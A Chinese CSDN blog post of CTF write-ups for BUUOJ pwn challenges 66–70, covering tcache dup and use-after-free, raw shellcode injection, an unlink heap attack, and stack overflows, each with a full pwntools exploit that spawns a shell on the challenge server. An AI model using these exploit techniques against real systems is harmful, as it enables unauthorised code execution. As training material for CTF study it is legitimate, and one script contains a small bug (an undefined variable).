buuoj Pwn writeup 66-70

最新推荐文章于 2024-02-15 20:42:52 发布
最新推荐文章于 2024-02-15 20:42:52 发布
阅读量273 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113812564
版权

66 ciscn_2019_final_3

保护

在这里插入图片描述c++的一个堆。
逻辑挺简单。

在这里插入图片描述
add

在这里插入图片描述HIDWORD是IAD里面的宏定义。
在这里插入图片描述在这里插入图片描述最多申请24个。
size下面放index,然后申请的chunk地址放在2022a0.
在这里插入图片描述还把地址输了出来。

remove
在这里插入图片描述这个题给的东西比较少,给了堆的地址,给了申请,给了释放。

释放之后有个uaf。

思路就是首先我们需要泄露地址,程序里面的gift可以做到这一点,通过它来获得PIE,进而知道malloc_hook。

free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,free之后才能进unsortbin,所以只能通过修改chunksize,其次要得到libc地址必须要分配到这块地方题目才能给你打印出来,通过overlap可以将在tcache中的fd部分变为unsortbin的fd部分,从而分配到libc地址上空间。

在这里插入图片描述
这个是overlap之后的heap布局。

在这里插入图片描述因为这道题唯一能够输出地址的只能是去申请到那个地方的chunk,那么通过overlap,把main_arena地址写在一个被overlap的chunk的fd那里,而且要提前把chunk挂到链里面,不然chunk的大小会被修改。
上面那个图就是效果图,这个时候如果去申请tcache大小的chunk的话,就会申请到main_arena,并且做到泄露地址。

然后就是随便找个chunk,来一次double free,攻击malloc_hook,来拿到shell。

# -*- coding: utf-8 -*-
from pwn import *

r = remote("node3.buuoj.cn",28201)
#r = process("./66")
#libc=ELF('/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.27-3ubuntu1.2_amd64/libc.so.6')
libc = ELF("./libc.so.6")

context.log_level = "debug"

def add(idx,size,data):
    r.recvuntil('choice > ')
    r.sendline('1')
    r.recvuntil('the index')
    r.sendline(str(idx))
    r.recvuntil('the size')
    r.sendline(str(size))
    r.recvuntil('something')
    r.sendline(data)
    r.recvuntil('gift :')
    return int(r.recvline()[2:],16)
#这个地方这样接收地址,这种写法非常好

def free(idx):
    r.recvuntil('choice > ')
    r.sendline('2')
    r.recvuntil('the index')
    r.sendline(str(idx))   

heap=add(0,0x78,'a')#0
print(hex(heap))

add(1,0x18,'b')#1
add(2,0x78,'c')#2
add(3,0x78,'d')#3 
add(4,0x78,'c')#4
add(5,0x78,'d')#5 
add(6,0x78,'c')#6
add(7,0x78,'d')#7 
add(8,0x78,'c')#8
add(9,0x78,'d')#9 
add(10,0x78,'c')#10
add(11,0x78,'d')#11
add(12,0x28,'d')#12

free(12)
free(12)

add(13,0x28,p64(heap-0x10))#4 修改为chunk0 size的地址
add(14,0x28,p64(heap-0x10))#5
add(15,0x28,p64(0)+p64(0x421))
#overlap
free(0) #unsort_bin chunk0->fd=libc
free(1) #tcache
add(16,0x78,'e')
add(17,0x18,'f')
'''
libc_base=add(18,0x18,'g')-0x3ebca0
malloc_hook=libc_base+libc.sym['__malloc_hook']
'''
malloc_hook = (add(18, 0x18, 'g') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']

#这样写可以避免不同的libc需要减的那个数字不一样。

one_gadget=libc_base+0x10a38c
print(hex(libc_base),hex(malloc_hook))

#dup
free(5)
free(5)
add(19,0x78,p64(malloc_hook))
add(20,0x78,p64(malloc_hook))
add(21,0x78,p64(one_gadget))
#getshell

#gdb.attach(r)

r.sendline("1")
r.sendline("22")
r.sendline('a')

r.interactive()

67 mrctf2020_shellcode

保护
在这里插入图片描述
在这里插入图片描述
因为有call rax 反编译不了,就直接看吧。

没开NX,然后call rax那里直接把buf的地址放了进去,所以回call那里,所以直接在那个地方写上shellcode就好。

exp

# -*- coding: utf-8 -*
from pwn import *

context.arch = "amd64"
context.log_level = "debug"
r = remote('node3.buuoj.cn',26456)
#r = process('./65')
elf = ELF('./67') 
libc = ELF("./64/libc-2.23.so")

shellcode = asm(shellcraft.sh())

r.sendline(shellcode)

r.interactive()

68 hitcontraining_magicheap

保护
在这里插入图片描述
在这里插入图片描述菜单堆。

create
在这里插入图片描述
就是正常的申请空间然后往里面写内容。

edit
在这里插入图片描述编辑的时候输入大小就又能随便写,这就有溢出嘛。

delete
在这里插入图片描述这里指针啥的都清空了。

后门函数也有。
在这里插入图片描述
根据主程序写的,他就是要求往magic的地方写入一个比较大的数字,因为现在libc更新,所以unsortedbin_attack可以说是直接消失了,因为他会检查链表的完整性。

  /* Record incoming configuration of top */

  old_top = av->top;
  old_size = chunksize (old_top);
  old_end = (char *) (chunk_at_offset (old_top, old_size));

  brk = snd_brk = (char *) (MORECORE_FAILURE);

  /*
     If not the first time through, we require old_size to be
     at least MINSIZE and to have prev_inuse set.
   */

  assert ((old_top == initial_top (av) && old_size == 0) ||
          ((unsigned long) (old_size) >= MINSIZE &&
           prev_inuse (old_top) &&
           ((unsigned long) old_end & (pagesize - 1)) == 0));

  /* Precondition: not enough current space to satisfy nb request */
  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));

所以我们在这里就直接用unlink。

回顾一下unlink

#define unlink(P, BK, FD)
{
    FD = P->fd;
    BK = P->bk;
    if(FD->bk != P || BK->fd !=p)
    {
        malloc_printerr (check_action, "corrupted d...", P);
    }
    else
    {
        FD->bk = BK;
        BK->fd = FD;
    }
}

通过unlink,把劫持heaparray,然后把第一个数组那里写成free的got,参数,参数的地址,都写在这个地方,然后修改free为system,从而拿到shell。

exp

# -*- coding: utf-8 -*-
from pwn import *

r = remote('node3.buuoj.cn',26365)
#r = process('./41')
context.log_level = "debug"
elf=ELF("./68")
free_got=elf.got['free']
system_plt=elf.plt['system']
context.log_level='debug'
ptr=0x6020c8

def create(size,content):
    r.recvuntil('Your choice :')
    r.sendline("1")
    r.recvuntil('Size of Heap : ')
    r.sendline(str(size))
    r.recvuntil('Content of heap:')
    r.sendline(content)

def edit(index, size, content):
    r.recvuntil('Your choice :')
    r.sendline('2')
    r.recvuntil('Index :')
    r.sendline(str(index))
    r.recvuntil('Size of Heap : ')
    r.sendline(str(size))
    r.recvuntil('Content of heap : ')
    r.send(content) 
#这个地方要特殊注意,因为我们后面输入大小的时候直接按照字符串大小输入的
#如果我们是sendline,那么会多送一个回车,但是read读不进去,因为read的参数大小受限
#所以他会把这个回车留到下一次输入的时候顺便读进去,这就造成了很大的问题
#所以这个地方要格外小心

def delete(index):
    r.recvuntil('Your choice :')
    r.sendline('3')
    r.recvuntil('Index :')
    r.sendline(str(index))
    
create(0x100,'aaaa')
create(0x20,'bbbb')
create(0x80,'cccc')

payload = p64(0) + p64(0x21) + p64(ptr-0x18) + p64(ptr-0x10)
payload += p64(0x20) + p64(0x90)

edit(1,len(payload),payload)

delete(2)

payload = p64(0) + p64(0) + p64(free_got)
payload += p64(ptr-0x18) + p64(ptr+0x10) + "/bin/sh"

edit(1,len(payload),payload)
edit(0,8,p64(system_plt))

delete(2)

r.interactive()

69 pwnable_start

保护
在这里插入图片描述在这里插入图片描述
程序还挺有意思,没有开NX。

显示系统调用号为4的write函数,然后是系统调用号为3的read函数。
先是把那一串文字写出来,然后让你往栈上面输东西。
因为最后两句是 add esp,14h,ret。所以栈的大小是14h,而且没有用esp,就是直接接返回地址。

首先要泄露地址。
因为程序一开始将esp入栈了,所以程序返回之后,栈顶就是之前esp的地址。

在这里插入图片描述

然后溢出,调用系统调用号是11的execve就行了。

程序还规定了写入的大小,用pwntools的话就太多了,所以还是自己手写一个。

exp

from pwn import *

context(os='linux',arch='i386',log_level='debug')

r = remote("node3.buuoj.cn","27571")

payload = 'A'*0x14 + p32(0x8048087)
r.sendafter("Let's start the CTF:",x)

stack = u32(r.recv(4))
print(hex(stack))

esp = stack - 0x4

shellcode ='''
xor ecx,ecx
xor edx,edx
xor eax,eax
mov al,11
xor ebx,ebx
mov ebx,esp
int 0x80
'''

payload = 'A' * 0x14 + p32(esp+0x14+0xc) + '/bin/sh\x00' + asm(shellcode)
r.send(payload)

r.interactive()

70 wustctf2020_getshell_2

保护在这里插入图片描述
在这里插入图片描述
平平无奇栈溢出。

在这里插入图片描述但是这个后门函数参数有点问题。

溢出的空间不大,没有办法常规做法。
栈迁移没办法做,不能往bss写一些东西。

回到上面给的那个后门函数,发现可以直接用/sh。

system(’/sh’)也是后门函数。
在这里插入图片描述
exp

from pwn import *

context(os='linux',arch='i386',log_level='debug')

r = remote('node3.buuoj.cn', 26920)

system_addr = 0x8048529
sh_addr = 0x8048670

payload = 'a' * 28 + p32(system_addr) + p32(sh_addr)
r.send(payload)

r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 397
buuctf-pwn 001-016题wp
buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 346
buu刷题】ciscn_2019_final_3 write up
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 413
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
ciscn_2019_final_3
、moddemod
07-08 641
tcache机制的利用,通过unsorted泄露进而将堆空间开辟到libc中,写__free_hook拿到shell… exp from pwn import * context.log_level = 'debug' def pause_debug(): log.info(proc.pidof(p)) pause() def add(idx, size, content): p.sendlineafter('choice >', str(1)) p.sendl.
BUUCTF PWN-----第1题:test_your_nc
热门推荐
bing_Max的博客
08-27 1万+
buuoj-----第四题:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 657
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 326
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 143
buuoj/buuctf pwn 刷题
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 413
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
buuoj 小明的保险箱 writeup
m0_73605862的博客
05-23 245
【来源】(buuoj)https://buuoj.cn/challenges#%E5%B0%8F%E6%98%8E%E7%9A%84%E4%BF%9D%E9%99%A9%E7%AE%B1。step3:根据题目提示是4位的纯数字所以是,选择所有数字,暴力破解,最大的长度和最小的长度都选择4,开始破解。得到一个rar文件夹。Step1:打开文件发现是一个图片,然后根据题目意思是有一个隐藏文件。【思路】得到隐藏文件并且暴力破解密码。Step4:得到密码,得到flag。【题目】小明的保险箱。
buuoj helloword writeup
m0_73605862的博客
05-18 122
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 996
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
[Buuoj刷题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 306
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 413
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值